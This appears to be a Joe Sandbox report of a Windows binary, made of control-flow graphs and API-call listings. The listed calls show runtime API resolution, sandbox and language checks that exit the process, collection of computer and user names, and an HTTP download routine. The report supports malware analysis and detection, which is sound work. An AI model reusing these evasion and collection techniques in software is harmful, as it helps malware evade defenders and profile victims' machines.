26872->26873 26874 e33bcb 26873->26874 26875 e34a60 2 API calls 26874->26875 26876 e33be1 26875->26876 26877 e34a60 2 API calls 26876->26877 26878 e33bf7 26877->26878 26879 e34a60 2 API calls 26878->26879 26880 e33c0d 26879->26880 26881 e34a60 2 API calls 26880->26881 26882 e33c23 26881->26882 26883 e34a60 2 API calls 26882->26883 26884 e33c39 26883->26884 26885 e34a60 2 API calls 
26884->26885 26886 e33c52 26885->26886 26887 e34a60 2 API calls 26886->26887 26888 e33c68 26887->26888 26889 e34a60 2 API calls 26888->26889 26890 e33c7e 26889->26890 26891 e34a60 2 API calls 26890->26891 26892 e33c94 26891->26892 26893 e34a60 2 API calls 26892->26893 26894 e33caa 26893->26894 26895 e34a60 2 API calls 26894->26895 26896 e33cc0 26895->26896 26897 e34a60 2 API calls 26896->26897 26898 e33cd9 26897->26898 26899 e34a60 2 API calls 26898->26899 26900 e33cef 26899->26900 26901 e34a60 2 API calls 26900->26901 26902 e33d05 26901->26902 26903 e34a60 2 API calls 26902->26903 26904 e33d1b 26903->26904 26905 e34a60 2 API calls 26904->26905 26906 e33d31 26905->26906 26907 e34a60 2 API calls 26906->26907 26908 e33d47 26907->26908 26909 e34a60 2 API calls 26908->26909 26910 e33d60 26909->26910 26911 e34a60 2 API calls 26910->26911 26912 e33d76 26911->26912 26913 e34a60 2 API calls 26912->26913 26914 e33d8c 26913->26914 26915 e34a60 2 API calls 26914->26915 26916 e33da2 26915->26916 26917 e34a60 2 API calls 26916->26917 26918 e33db8 26917->26918 26919 e34a60 2 API calls 26918->26919 26920 e33dce 26919->26920 26921 e34a60 2 API calls 26920->26921 26922 e33de7 26921->26922 26923 e34a60 2 API calls 26922->26923 26924 e33dfd 26923->26924 26925 e34a60 2 API calls 26924->26925 26926 e33e13 26925->26926 26927 e34a60 2 API calls 26926->26927 26928 e33e29 26927->26928 26929 e34a60 2 API calls 26928->26929 26930 e33e3f 26929->26930 26931 e34a60 2 API calls 26930->26931 26932 e33e55 26931->26932 26933 e34a60 2 API calls 26932->26933 26934 e33e6e 26933->26934 26935 e34a60 2 API calls 26934->26935 26936 e33e84 26935->26936 26937 e34a60 2 API calls 26936->26937 26938 e33e9a 26937->26938 26939 e34a60 2 API calls 26938->26939 26940 e33eb0 26939->26940 26941 e34a60 2 API calls 26940->26941 26942 e33ec6 26941->26942 26943 e34a60 2 API calls 26942->26943 26944 e33edc 26943->26944 26945 e34a60 2 API calls 26944->26945 26946 e33ef5 26945->26946 26947 e34a60 2 API calls 26946->26947 
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E34C7F
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E34CD2
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E34D05
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E34D35
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E34D73
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E34DA6
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E34DB6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$InternetOpen
                              • String ID: "$------
                              • API String ID: 2041821634-2370822465
                              • Opcode ID: 28498b444cc7e348516d74dbd30b3bf3361cec1190b6af2eda691732299a259b
                              • Instruction ID: b6059b3355154e2f0c18bb717f68979c043b2d89885932d8870651d7e387e7b3
                              • Opcode Fuzzy Hash: 28498b444cc7e348516d74dbd30b3bf3361cec1190b6af2eda691732299a259b
                              • Instruction Fuzzy Hash: 05529D729003159FDB21EFA4D849AAE7BF9AF44304F156428FA85BB251DB35EC41CBA0

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2125 e56390-e563bd GetPEB 2126 e565c3-e56623 LoadLibraryA * 5 2125->2126 2127 e563c3-e565be call e562f0 GetProcAddress * 20 2125->2127 2129 e56625-e56633 GetProcAddress 2126->2129 2130 e56638-e5663f 2126->2130 2127->2126 2129->2130 2131 e56641-e56667 GetProcAddress * 2 2130->2131 2132 e5666c-e56673 2130->2132 2131->2132 2134 e56675-e56683 GetProcAddress 2132->2134 2135 e56688-e5668f 2132->2135 2134->2135 2136 e566a4-e566ab 2135->2136 2137 e56691-e5669f GetProcAddress 2135->2137 2139 e566d7-e566da 2136->2139 2140 e566ad-e566d2 GetProcAddress * 2 2136->2140 2137->2136 2140->2139
                              APIs
                              • GetProcAddress.KERNEL32(76210000,00D21750), ref: 00E563E9
                              • GetProcAddress.KERNEL32(76210000,00D21540), ref: 00E56402
                              • GetProcAddress.KERNEL32(76210000,00D21660), ref: 00E5641A
                              • GetProcAddress.KERNEL32(76210000,00D215A0), ref: 00E56432
                              • GetProcAddress.KERNEL32(76210000,00D288F8), ref: 00E5644B
                              • GetProcAddress.KERNEL32(76210000,00D16740), ref: 00E56463
                              • GetProcAddress.KERNEL32(76210000,00D16720), ref: 00E5647B
                              • GetProcAddress.KERNEL32(76210000,00D21768), ref: 00E56494
                              • GetProcAddress.KERNEL32(76210000,00D21558), ref: 00E564AC
                              • GetProcAddress.KERNEL32(76210000,00D215E8), ref: 00E564C4
                              • GetProcAddress.KERNEL32(76210000,00D21570), ref: 00E564DD
                              • GetProcAddress.KERNEL32(76210000,00D16860), ref: 00E564F5
                              • GetProcAddress.KERNEL32(76210000,00D216D8), ref: 00E5650D
                              • GetProcAddress.KERNEL32(76210000,00D215D0), ref: 00E56526
                              • GetProcAddress.KERNEL32(76210000,00D16780), ref: 00E5653E
                              • GetProcAddress.KERNEL32(76210000,00D21600), ref: 00E56556
                              • GetProcAddress.KERNEL32(76210000,00D21780), ref: 00E5656F
                              • GetProcAddress.KERNEL32(76210000,00D16920), ref: 00E56587
                              • GetProcAddress.KERNEL32(76210000,00D216F0), ref: 00E5659F
                              • GetProcAddress.KERNEL32(76210000,00D16A20), ref: 00E565B8
                              • LoadLibraryA.KERNEL32(00D217B0,?,?,?,00E51C03), ref: 00E565C9
                              • LoadLibraryA.KERNEL32(00D21708,?,?,?,00E51C03), ref: 00E565DB
                              • LoadLibraryA.KERNEL32(00D217E0,?,?,?,00E51C03), ref: 00E565ED
                              • LoadLibraryA.KERNEL32(00D21588,?,?,?,00E51C03), ref: 00E565FE
                              • LoadLibraryA.KERNEL32(00D21618,?,?,?,00E51C03), ref: 00E56610
                              • GetProcAddress.KERNEL32(75B30000,00D217F8), ref: 00E5662D
                              • GetProcAddress.KERNEL32(751E0000,00D21630), ref: 00E56649
                              • GetProcAddress.KERNEL32(751E0000,00D21648), ref: 00E56661
                              • GetProcAddress.KERNEL32(76910000,00D28F60), ref: 00E5667D
                              • GetProcAddress.KERNEL32(75670000,00D168A0), ref: 00E56699
                              • GetProcAddress.KERNEL32(77310000,00D28958), ref: 00E566B5
                              • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00E566CC
                              Strings
                              • NtQueryInformationProcess, xrefs: 00E566C1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: aab36e205ddbb36d5c1278a04430545ede67717be98a96d603051446401ec148
                              • Instruction ID: 5588fcf93f813da705e9dbf3400deaf44587e03ddacec28e5f06cb226a1aeb24
                              • Opcode Fuzzy Hash: aab36e205ddbb36d5c1278a04430545ede67717be98a96d603051446401ec148
                              • Instruction Fuzzy Hash: 53A162B56153009FE774DFA4E958A2637B9F788749300891AF995C3B2CDB7EA900CF60

                              Control-flow Graph

                              • Executed
                              • Not Executed
control_flow_graph 2141 e51bf0-e51c0b call e32a90 call e56390 2146 e51c0d 2141->2146 2147 e51c1a-e51c27 call e32930 2141->2147 2148 e51c10-e51c18 2146->2148 2151 e51c35-e51c63 2147->2151 2152 e51c29-e51c2f lstrcpy 2147->2152 2148->2147 2148->2148 2156 e51c65-e51c67 ExitProcess 2151->2156 2157 e51c6d-e51c7b GetSystemInfo 2151->2157 2152->2151 2158 e51c85-e51ca0 call e31030 call e310c0 GetUserDefaultLangID 2157->2158 2159 e51c7d-e51c7f ExitProcess 2157->2159 2164 e51ca2-e51ca9 2158->2164 2165 e51cb8-e51cca call e52ad0 call e53e10 2158->2165 2164->2165 2167 e51cb0-e51cb2 ExitProcess 2164->2167 2171 e51ce7-e51d06 lstrlen call e32930 2165->2171 2172 e51ccc-e51cde call e52a40 call e53e10 2165->2172 2178 e51d23-e51d40 lstrlen call e32930 2171->2178 2179 e51d08-e51d0d 2171->2179 2172->2171 2185 e51ce0-e51ce1 ExitProcess 2172->2185 2186 e51d42-e51d44 2178->2186 2187 e51d5a-e51d7b call e52ad0 lstrlen call e32930 2178->2187 2179->2178 2182 e51d0f-e51d11 2179->2182 2182->2178 2183 e51d13-e51d1d lstrcpy lstrcat 2182->2183 2183->2178 2186->2187 2188 e51d46-e51d54 lstrcpy lstrcat 2186->2188 2193 e51d7d-e51d7f 2187->2193 2194 e51d9a-e51db4 lstrlen call e32930 2187->2194 2188->2187 2193->2194 2195 e51d81-e51d85 2193->2195 2199 e51db6-e51db8 2194->2199 2200 e51dce-e51deb call e52a40 lstrlen call e32930 2194->2200 2195->2194 2198 e51d87-e51d94 lstrcpy lstrcat 2195->2198 2198->2194 2199->2200 2201 e51dba-e51dc8 lstrcpy lstrcat 2199->2201 2206 e51ded-e51def 2200->2206 2207 e51e0a-e51e0f 2200->2207 2201->2200 2206->2207 2208 e51df1-e51df5 2206->2208 2209 e51e16-e51e22 call e32930 2207->2209 2210 e51e11 call e32a20 2207->2210 2208->2207 2211 e51df7-e51e04 lstrcpy lstrcat 2208->2211 2215 e51e24-e51e26 2209->2215 2216 e51e30-e51e66 call e32a20 * 5 OpenEventA 2209->2216 2210->2209 2211->2207 2215->2216 2217 e51e28-e51e2a lstrcpy 2215->2217 2228 e51e8c-e51ea0 CreateEventA call e51b20 call e4ffd0 2216->2228 2229 e51e68-e51e8a CloseHandle Sleep OpenEventA 2216->2229 2217->2216 2233 e51ea5-e51eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                              APIs
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D21750), ref: 00E563E9
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D21540), ref: 00E56402
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D21660), ref: 00E5641A
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D215A0), ref: 00E56432
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D288F8), ref: 00E5644B
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D16740), ref: 00E56463
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D16720), ref: 00E5647B
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D21768), ref: 00E56494
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D21558), ref: 00E564AC
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D215E8), ref: 00E564C4
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D21570), ref: 00E564DD
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D16860), ref: 00E564F5
                                • Part of subcall function 00E56390: GetProcAddress.KERNEL32(76210000,00D216D8), ref: 00E5650D
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E51C2F
                              • ExitProcess.KERNEL32 ref: 00E51C67
                              • GetSystemInfo.KERNEL32(?), ref: 00E51C71
                              • ExitProcess.KERNEL32 ref: 00E51C7F
                                • Part of subcall function 00E31030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E31046
                                • Part of subcall function 00E31030: VirtualAllocExNuma.KERNEL32(00000000), ref: 00E3104D
                                • Part of subcall function 00E31030: ExitProcess.KERNEL32 ref: 00E31058
                                • Part of subcall function 00E310C0: GlobalMemoryStatusEx.KERNEL32 ref: 00E310EA
                                • Part of subcall function 00E310C0: ExitProcess.KERNEL32 ref: 00E31114
                              • GetUserDefaultLangID.KERNEL32 ref: 00E51C8F
                              • ExitProcess.KERNEL32 ref: 00E51CB2
                              • ExitProcess.KERNEL32 ref: 00E51CE1
                              • lstrlen.KERNEL32(00D28AB8), ref: 00E51CEE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E51D15
                              • lstrcat.KERNEL32(00000000,00D28AB8), ref: 00E51D1D
                              • lstrlen.KERNEL32(00E64B98), ref: 00E51D28
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51D48
                              • lstrcat.KERNEL32(00000000,00E64B98), ref: 00E51D54
                              • lstrlen.KERNEL32(00000000), ref: 00E51D63
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51D89
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E51D94
                              • lstrlen.KERNEL32(00E64B98), ref: 00E51D9F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51DBC
                              • lstrcat.KERNEL32(00000000,00E64B98), ref: 00E51DC8
                              • lstrlen.KERNEL32(00000000), ref: 00E51DD7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51DF9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E51E04
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
• Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                              • String ID:
                              • API String ID: 3366406952-0
                              • Opcode ID: fccfde7c83931f46cccc67651c6307da252ed6b4b3fbb0399ff8a6e43d1a7fc8
                              • Instruction ID: 278067602482f93bda76b3f82c144a0ab23ac593ae00ace606709e8cec4f628a
                              • Opcode Fuzzy Hash: fccfde7c83931f46cccc67651c6307da252ed6b4b3fbb0399ff8a6e43d1a7fc8
                              • Instruction Fuzzy Hash: 5871B131540305AFDB31ABB0DC4DB6E7BB9AF4074AF046868FE86B6195DB399805CB60

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2234 e36c40-e36c64 call e32930 2237 e36c66-e36c6b 2234->2237 2238 e36c75-e36c97 call e34bc0 2234->2238 2237->2238 2239 e36c6d-e36c6f lstrcpy 2237->2239 2242 e36caa-e36cba call e32930 2238->2242 2243 e36c99 2238->2243 2239->2238 2247 e36cc8-e36cf5 InternetOpenA StrCmpCA 2242->2247 2248 e36cbc-e36cc2 lstrcpy 2242->2248 2244 e36ca0-e36ca8 2243->2244 2244->2242 2244->2244 2249 e36cf7 2247->2249 2250 e36cfa-e36cfc 2247->2250 2248->2247 2249->2250 2251 e36d02-e36d22 InternetConnectA 2250->2251 2252 e36ea8-e36ebb call e32930 2250->2252 2253 e36ea1-e36ea2 InternetCloseHandle 2251->2253 2254 e36d28-e36d5d HttpOpenRequestA 2251->2254 2261 e36ec9-e36ee0 call e32a20 * 2 2252->2261 2262 e36ebd-e36ebf 2252->2262 2253->2252 2256 e36d63-e36d65 2254->2256 2257 e36e94-e36e9e InternetCloseHandle 2254->2257 2259 e36d67-e36d77 InternetSetOptionA 2256->2259 2260 e36d7d-e36dad HttpSendRequestA HttpQueryInfoA 2256->2260 2257->2253 2259->2260 2264 e36dd4-e36de4 call e53d90 2260->2264 2265 e36daf-e36dd3 call e571e0 call e32a20 * 2 2260->2265 2262->2261 2266 e36ec1-e36ec3 lstrcpy 2262->2266 2264->2265 2275 e36de6-e36de8 2264->2275 2266->2261 2277 e36dee-e36e07 InternetReadFile 2275->2277 2278 e36e8d-e36e8e InternetCloseHandle 2275->2278 2277->2278 2280 e36e0d 2277->2280 2278->2257 2282 e36e10-e36e15 2280->2282 2282->2278 2283 e36e17-e36e3d call e57310 2282->2283 2286 e36e44-e36e51 call e32930 2283->2286 2287 e36e3f call e32a20 2283->2287 2291 e36e53-e36e57 2286->2291 2292 e36e61-e36e8b call e32a20 InternetReadFile 2286->2292 2287->2286 2291->2292 2293 e36e59-e36e5b lstrcpy 2291->2293 2292->2278 2292->2282 2293->2292
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E36C6F
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E36CC2
                              • InternetOpenA.WININET(00E5CFEC,00000001,00000000,00000000,00000000), ref: 00E36CD5
                              • StrCmpCA.SHLWAPI(?,00D2FAE0), ref: 00E36CED
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E36D15
                              • HttpOpenRequestA.WININET(00000000,GET,?,00D2F470,00000000,00000000,-00400100,00000000), ref: 00E36D50
                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00E36D77
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E36D86
                              • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00E36DA5
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E36DFF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E36E5B
                              • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00E36E7D
                              • InternetCloseHandle.WININET(00000000), ref: 00E36E8E
                              • InternetCloseHandle.WININET(?), ref: 00E36E98
                              • InternetCloseHandle.WININET(00000000), ref: 00E36EA2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E36EC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                              • String ID: ERROR$GET
                              • API String ID: 3687753495-3591763792
                              • Opcode ID: 3c761d191057caba395aaa3958102bc33055a7aeaa0bf600e5b31d61a55c4511
                              • Instruction ID: 25ab098b58ed35be0554aa69bd442a54700c07432ebbe47e5f8eb4a503eee5cc
                              • Opcode Fuzzy Hash: 3c761d191057caba395aaa3958102bc33055a7aeaa0bf600e5b31d61a55c4511
                              • Instruction Fuzzy Hash: 6C818071A40315AFEB20DFA5DC49BAE7BB8AF44704F149458FA45FB280DB75AE04CB90

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2850 e34a60-e34afc RtlAllocateHeap 2867 e34b7a-e34bbe VirtualProtect 2850->2867 2868 e34afe-e34b03 2850->2868 2869 e34b06-e34b78 2868->2869 2869->2867
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E34AA3
                              • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00E34BB0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-3329630956
                              • Opcode ID: 8dd841505d40ddda2b229e7e7935bd69d45b41a7eae2a09d4e4eb43131f91598
                              • Instruction ID: 6e87889eb4ec0c0905ea804b521c235a1fb848cda31dca26437a6440a85e6601
                              • Opcode Fuzzy Hash: 8dd841505d40ddda2b229e7e7935bd69d45b41a7eae2a09d4e4eb43131f91598
                              • Instruction Fuzzy Hash: A6312898BC032E768628EBFF6C47F5F6E55DFC57E0B01A0567428731C1C9A15401CBA2

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2957 e52ad0-e52b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 e52b44-e52b59 2957->2958 2959 e52b24-e52b36 2957->2959
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00E52AFF
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E52B06
                              • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00E52B1A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 2aa3aca4207626e53a31065305aa306b3fa32f8250748ef8178f5afa6903817d
                              • Instruction ID: 946873f01d640c8e1c06675eea01937283769148a1032b2527b9877ef7834339
                              • Opcode Fuzzy Hash: 2aa3aca4207626e53a31065305aa306b3fa32f8250748ef8178f5afa6903817d
                              • Instruction Fuzzy Hash: BE01D672A44208AFDB10CF99ED45B9DF7B8F745B25F00026AFD15E3780D779190487A1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00E52A6F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E52A76
                              • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00E52A8A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: e3962b151b0e3151508231d3fdd1f75fe12fddde542bf22472ab6e82511249a0
                              • Instruction ID: b74a1b8c36fef62284fd66f6130c0c549ac3654e0f6949a2e92ee0b0e3e6c5e0
                              • Opcode Fuzzy Hash: e3962b151b0e3151508231d3fdd1f75fe12fddde542bf22472ab6e82511249a0
                              • Instruction Fuzzy Hash: B4F090B1A40204AFD710DB88DD49B9EBBBCF704B25F000226FA15E3680D7B9190487A1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 e566e0-e566e7 634 e566ed-e56af9 GetProcAddress * 43 633->634 635 e56afe-e56b92 LoadLibraryA * 8 633->635 634->635 636 e56b94-e56c03 GetProcAddress * 5 635->636 637 e56c08-e56c0f 635->637 636->637 638 e56c15-e56ccd GetProcAddress * 8 637->638 639 e56cd2-e56cd9 637->639 638->639 640 e56d4f-e56d56 639->640 641 e56cdb-e56d4a GetProcAddress * 5 639->641 642 e56d5c-e56de4 GetProcAddress * 6 640->642 643 e56de9-e56df0 640->643 641->640 642->643 644 e56df6-e56f0b GetProcAddress * 12 643->644 645 e56f10-e56f17 643->645 644->645 646 e56f8d-e56f94 645->646 647 e56f19-e56f88 GetProcAddress * 5 645->647 648 e56f96-e56fbc GetProcAddress * 2 646->648 649 e56fc1-e56fc8 646->649 647->646 648->649 650 e56ff5-e56ffc 649->650 651 e56fca-e56ff0 GetProcAddress * 2 649->651 652 e57002-e570e8 GetProcAddress * 10 650->652 653 e570ed-e570f4 650->653 651->650 652->653 654 e570f6-e5714d GetProcAddress * 4 653->654 655 e57152-e57159 653->655 654->655 656 e5716e-e57175 655->656 657 e5715b-e57169 GetProcAddress 655->657 658 e57177-e571ce GetProcAddress * 4 656->658 659 e571d3 656->659 657->656 658->659
                              APIs
                              • GetProcAddress.KERNEL32(76210000,00D16960), ref: 00E566F5
                              • GetProcAddress.KERNEL32(76210000,00D167E0), ref: 00E5670D
                              • GetProcAddress.KERNEL32(76210000,00D290B0), ref: 00E56726
                              • GetProcAddress.KERNEL32(76210000,00D29038), ref: 00E5673E
                              • GetProcAddress.KERNEL32(76210000,00D29050), ref: 00E56756
                              • GetProcAddress.KERNEL32(76210000,00D2DA60), ref: 00E5676F
                              • GetProcAddress.KERNEL32(76210000,00D1A898), ref: 00E56787
                              • GetProcAddress.KERNEL32(76210000,00D2DBB0), ref: 00E5679F
                              • GetProcAddress.KERNEL32(76210000,00D2DA78), ref: 00E567B8
                              • GetProcAddress.KERNEL32(76210000,00D2D910), ref: 00E567D0
                              • GetProcAddress.KERNEL32(76210000,00D2DB20), ref: 00E567E8
